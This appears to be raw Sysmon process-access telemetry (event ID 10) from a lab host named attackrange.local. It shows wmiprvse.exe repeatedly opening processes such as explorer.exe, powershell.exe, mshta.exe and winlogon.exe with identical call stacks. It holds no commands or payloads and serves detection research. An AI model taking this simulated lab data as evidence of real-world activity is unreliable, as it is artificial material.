15:59:33.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5363-6008-5E06-00000000A301}7124C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025913Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5363-6008-5D06-00000000A301}6844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025912Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5363-6008-5C06-00000000A301}4084C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025911Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025910Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025909Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025908Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025907Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025906Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025905Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025904Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025903Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025902Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025901Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025900Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025899Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025898Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025897Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025896Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025895Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025894Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 